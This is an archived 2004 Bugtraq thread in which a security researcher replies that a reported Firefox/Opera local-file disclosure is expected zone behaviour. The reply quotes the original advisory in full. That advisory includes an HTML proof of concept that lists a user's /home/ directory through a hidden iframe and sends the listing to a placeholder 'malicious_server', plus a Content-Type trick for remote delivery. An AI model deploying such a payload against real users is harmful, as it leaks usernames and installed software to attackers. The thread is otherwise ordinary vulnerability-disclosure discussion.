Bugtraqmailing list archives
RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: "Thor Larholm" <thor () pivx com>
Date: Mon, 6 Dec 2004 13:36:57 -0800
This is not a vulnerability, it is expected behavior.Mozilla shares the same zone design as IE which means that a file fromthe local file zone can read any other file from the local file zone.You cannot use this approach to read a local file from another zone suchas the Internet zone. From the Internet zone, you can also only read thecontent of files from the same zone, same protocol and same domain.I agree that Mozilla has implemented quite a lot of proprietary IEextensions which it should have not done, however reading the innerHTMLof an element through document.all does not circumvent the traditionalzone security checks already in place.If you can find a cross zone scripting vulnerability in Mozilla thisbecomes relevant, however in that case you would be better off jumpinginto a chrome:// document from which you can execute arbitrary commands.RegardsThor LarholmSenior Security ResearcherPivX Solutions23 Corporate Plaza #280Newport Beach, CA 92660http://www.pivx.comthor () pivx comStock symbol: (PIVX.OB)Phone: +1 (949) 231-8496PGP: 0x4207AEE9B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9PivX defines a new genre in Desktop Security: Proactive ThreatMitigation. <http://www.pivx.com/qwikfix> -----Original Message-----From: Giovanni Delvecchio [mailto:badpenguin79 () hotmail com] Sent: Wednesday, December 01, 2004 5:15 PMTo: bugtraq () securityfocus comSubject: Disclosure of file system information in Mozilla Firefox andOpera Browser:Title: Disclosure of file system information in Mozilla Firefox andOpera BrowserNote:I don't know if it could be considered really a security problem, anywayi'll try to explain my ideas.Sorry for my bad english.Author: Giovanni DelvecchioBug: Disclosure of file system informationApplications affected:- Firefox 1.0- Mozilla 1.7- Opera 7.54 (*)( maybe also previous versions )Tested versions:- Firefox 1.0 on Linux and Windows- Mozilla 1.7 on Windows- Opera 7.51,..7.54 on LinuxNote:The content of this advisory could be applied also to other browsers, ihave checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.Microsoft Internet Explorer seems not to be affected.Bug Description:================A problem exist in some browsers where a frame can gain access toattributes of another frame or iframe.An application of this bug could be the possibility to disclose local directory structure.PoC:===------ begin code.htm -----<html><body onLoad=" list_files=''; for(i=0;i<local_files.document.links.length;i++) {list_files+=local_files.document.links.item(i);} alert(list_files); //send list_files at malicious_server document.location.href='http://malicious_server/grab.php?list='+list_files; "><iframe name="local_files" src="file:///home/" height=0width=0></iframe></body></html>------ end of code.htm -------Impact:======A malicious server could obtain the content of /home/ directory ( or c:\Document and Setting\ for windows system ) and so know a set of usernames present on system target.Moreover, colud be possible know if a particolar program is installed ontarget system for a succesive attack.Anyway it cannot be exploited "directly" by a remote site, but only ifthe page is opened from a local path ( file://localpath/code.htm), sincethe iframe "local_files" belongs to a local domain.Note: with Internet Explorer code.htm doesn't work even in local.Possible Remote Exploitation:========================Question:How could a malicious remote user exploit it ?Answer:After that the user "victim" has requiredhttp://maliciuos_server/code.htm, if malicious_server responds with a page containing an unknownContent-Type field ( for example text/html. ,note the dot) ,the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" toview this page, it will be downloaded and opened in local ; javascriptcode will be executed in local context.Obviously, if user chooses to save and after open it the result isequal.(*) For Opera this method of remote exploitation requires that operamust be setted as Default Application in "handler for saved files" whetherthe user choose "Open" in the dialog window.Solution:========No solution at the momentVendor notice==============24th November 2004: I have contacted mozilla by security () mozilla organd Opera by its bug track page athttps://bugs.opera.com/wizard/No response from both at the moment.Best regards,Giovanni Delvecchio_________________________________________________________________Personalizza MSN Messenger con sfondi e fotografie!http://www.ilovemessenger.msn.it/
Current thread:
- Disclosure of file system information in Mozilla Firefox and Opera Browser:Giovanni Delvecchio (Dec 01)
- <Possible follow-ups>
- RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:Thor Larholm (Dec 07)